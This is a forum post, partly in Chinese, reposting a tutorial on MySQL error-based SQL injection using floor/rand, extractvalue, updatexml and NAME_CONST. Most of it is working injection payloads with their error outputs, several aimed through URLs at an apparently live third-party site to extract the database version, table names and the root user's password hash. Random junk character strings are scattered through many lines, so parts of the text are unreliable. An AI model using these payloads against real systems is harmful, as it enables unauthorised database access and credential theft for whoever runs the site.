|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
$ M5 @' N7 x5 n0 F首先进行正常查询: mysql> select * from article where id = 1;9 J0 w' r/ b- u
+—-+——-+———+
: n) Z( ], c9 f. ^| id | title | content |% O5 e& N8 H+ i& R
+—-+——-+———+
9 r) ?5 f) i! V$ f0 i8 T" T| 1 | test | do it |& U# r; e R# w, c- n
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
* @6 {! B; w4 YERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。2 a/ O g2 n% i9 ]
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
. v2 H8 _5 `6 ?- ]7 A! [& K; `ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));( k9 y4 B, F! j$ w+ d
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
8 k" v1 o0 |/ m& o8 \测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–& s' a2 ~2 r, p8 f F& _; H
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
9 f6 A8 W9 _, t8 u4 O; w" n" g# g* e( n( O
再收集: 8 C+ Y, o# R- u; n0 F+ M( d/ e
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) 4 T" W7 V5 n. z& Z! S+ a
5 C4 g0 B- a1 U4 {Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
- F; K P6 v' m1 q5 ?7 g% }* X2 A5 A6 p3 F7 T( Q
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
( I5 D1 N* k( Y+ c
; ?0 ^0 ?( H1 U: c: QErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
. M9 t; `+ H' U
. R1 I" P t+ m1 m* k6 CMYSQL高版本报错注入技巧-利用NAME_CONST注入
# o; O$ R- E* F FIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. - V6 W: Y9 t/ j: P' x
! D2 g' F6 | y" Q( ]9 ?
1 S' o) D3 G& W2 h U: I相关信息1 b9 G7 U8 @9 i" ^- ?0 D
+ f+ i0 U0 ?. o8 ^# O
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.4 l) \6 D" Y- C3 C; u2 p: V' {
# |/ M0 `! @ ]& x [7 s
Code:* M7 ]7 T9 q+ R( K& ]
NAME_CONST(DATA, VALUE). C% `5 f' D0 X! H
4 O3 u; n" J+ ?% _! F2 j v
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.3 m5 {- T- m2 C% `* K7 g
) p& X" j- u8 k+ X
SELECT NAME_CONST('TEST', 1)
4 g c P6 A9 N0 z# Y
" `6 {. |! h6 l) G W
2 a" s* y7 K# `. ?9 _& ]& Q' `" w+ k8 f u! ?% ]; ^4 e2 Z4 E, u
|---------------|
+ @# F' u; B9 X+ \( }" `6 Z; H| TEST |! p7 }& _6 J' J8 d4 I
| |, t0 c/ L. h4 g% B3 Z* t
|---------------|
' Y, L! [; `" ~' t- K( L| 1 | s" p5 Q$ k* g" e6 o- A; K
| |% t3 y3 \6 E4 |9 w) w% R
|---------------|
, C u0 m% w9 d$ [: F/ z+ l6 ?
3 }0 j- D P ^- ]0 y0 R/ k8 K% i0 v' g
8 S7 x0 A5 L" g2 n8 ~9 I5 W# c
5 t% ~. j# |- @4 Z0 E2 Lhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
4 w- G2 r. _; {: c; sIntro to MySQL Variables. l q/ d4 S3 h" ~
% H' m5 z& W! [% \! ]( R
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.( J0 [/ `# C) N4 ~: G+ k
5 d2 f8 {8 M7 n0 A: bCode:- i1 w: M$ d" C6 o
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261# o! ?: n1 H8 G4 W) u2 J2 s) q
: q1 _5 ~$ N+ T# o) {! d- P8 W2 }# u( B* _: T
2 l: R. C. U2 P- t' J% @6 S
; ?& ^4 |* z5 N9 l; N& {0 d
* C9 r. J8 {; v) B3 `Code:, ?9 S( o/ K0 q1 T! T/ p
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
. |; x- W! o0 W# O' c: Y+ v9 }! g
, L V, i( V2 G0 x# e4 x- O3 f
7 }/ U/ z, X0 V' f: k1 P n( ~VAR = Your MySQL variable.9 |5 K, x" d a
8 s0 D5 q. ?8 M# X1 T. \
MySQL 5.1.3 Server System Variables3 {: k* ]7 r5 Z) S/ S& u4 \' s6 p/ |
3 U4 N' d/ g& w4 F7 @1 O7 W
Let's try it out on my site..
9 [3 [# c! o% l, T. |* w8 ^/ ]$ @
Code:2 F1 Z m9 L5 B# A/ V# h
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--* j! e6 Z; V& ~3 Q
2 {' ?. s9 n6 [4 R5 A) QErroruplicate column name '5.0.27-community-nt'; F' h& ~( F: h4 j6 b- [4 C8 F
: E! n" t, f3 \0 ^7 h' P7 b1 R; ~* f
# ~; D! `* _9 L# X" V
$ U/ k U4 E2 e/ o3 n
q+ }& l ?, o. sNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again.... P% s# o, ~; h
) E B# c2 L/ O
Data Extraction
" x; A; C% l7 ?4 X; d5 L7 l
# Q- F5 e; m$ @2 hCode:
2 {) }" P# l H! M6 W8 G+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--; M6 G( j+ F0 i6 q9 v$ V
+ T( Y% g, ]+ c& L5 z6 a+ e
, i3 z A D) r5 PWe should get a duplicate column 1 error...
2 H, J' x ?% [- W1 I6 ^: m( |+ R) g" @# ]& }) ~/ |, L! x9 r( ?0 Z& r% M
Code:/ m! J* y# f# d; E; V
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--5 ^- c- _7 q3 h6 v; A! F
; Z. S! i6 p' c* {, D! j1 g: P
Erroruplicate column name '1+ P" V0 V; O o2 M' P" V6 }; n9 C+ @
& N, C0 O0 R3 S# u6 @; Y, ^
4 Q N" T! D1 A) W6 `% k, k; I4 \, l% p; ]: Y2 ?, Y y
, k: Q7 E. M- }3 ?
k8 A3 m9 e! s2 x0 q$ v
; j1 Y' S0 E7 h' Z. y4 Z( lNow let's get the tables out this bitch..
( I. h U7 Y# T- g3 e2 e
, J4 j/ j9 [# ^% M7 w4 iCode:
5 E( N( y* B: p( z! i+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--- P( y$ M) F' Y
& }* ^! ]7 L3 Q0 b1 w6 l
" g2 D0 P B' F6 E7 A6 J0 X9 BLet's see if it works here, if it does, we can go on and finish the job.
. m9 g( D! N0 I4 L' Q' q2 r8 D f- h3 W9 b4 Y
Code:2 n8 O8 `& ^# g0 f8 d5 `" \
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--6 j" Y& V5 d0 s; \( p4 H
' s/ B5 {0 b/ j3 E) e
/ Y+ X. w" r9 u; uErroruplicate column name 'com_admanage/ N6 S$ J4 @7 p( h
. K N6 N, N' `- [0 V9 c
: m* o& L6 ~9 b+ N; F
6 J6 b( C1 b; E i d
& |9 s. V/ I( l, B" M# b
8 a. O" M! T# l, z! o0 Z6 H3 B4 R- ^- k
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
4 D2 k* H7 T* u# |* x( p# \7 X/ c" u5 f) c4 m7 Z2 s! s: r
Let's get the columns out of the user table..
) P4 ]- G) u, l8 G! n) [* _% E
# ~( M1 x1 r+ ?' ~Code:
+ B, p9 N! \/ V1 D+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
9 K+ L' D+ D5 g- b4 Z, D$ p5 R: N% |) _# J
# O. A5 P( \& ^) S0 j1 Y. v& \
So mine looks like this, and I get the duplicate column name 'Host'.# A$ \) `- E8 E1 q, r
( f* u5 J/ ]! {, h6 S" x; y% k
Code:
, U2 y3 g4 z0 Z% J' Khttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
8 L2 h5 ?! k; m9 o. ]" ?, s3 L" G& ~0 _4 R+ k+ K7 b
Erroruplicate column name 'Host'
. ?% U- m2 m I; N. v! W; P+ h r4 s. s% [' S$ N% h: {
! N- r+ l; E- k! n7 E8 I- K
* F! y; q# g7 ~7 S3 `
+ x+ o, {, I& a# ?8 @5 b9 X
) x( G: E6 ^/ } _3 I5 }# V
: \& E. O# I& w. `Woot, time to finish this bitch off.
6 R: _, D. M) r* G' k2 {4 R/ a" J% ]5 X% B" }, k6 O' L5 l. W* G
Code:$ F! y1 r: u: F, }0 D
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
1 U$ F( z0 @1 z1 F
! ~$ V1 y2 R* ~6 t; u$ J4 T0 L/ Q6 E
So mine looks like this...+ Q( v9 V1 S; X8 B4 D+ n
6 E) R4 n6 N* p9 [' ECode:
8 E+ c- I7 Q9 l7 |0 Q1 dhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
2 C, W' \* P. f
8 @2 }& T! }' W9 Q: sErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
2 p/ p: D T( Q( \4 ]
+ U# U* t" o! q0 W! A6 e+ L* N& x
" v: X: p L5 s* e - w$ h3 K) |- e" t0 {$ Q0 @ I
! \7 a8 i d) c ~ w
+ s+ O9 l, h5 U6 }
' ]9 P/ P3 ~: m" N4 t7 Y, DAnd there we have it, thanks for reading./ U, b# k" |% Y: p
4 T1 u$ K2 K; {/ S7 m; f: d( o: q |
发表于 2015-11-11 19:03:37
收藏
支持
反对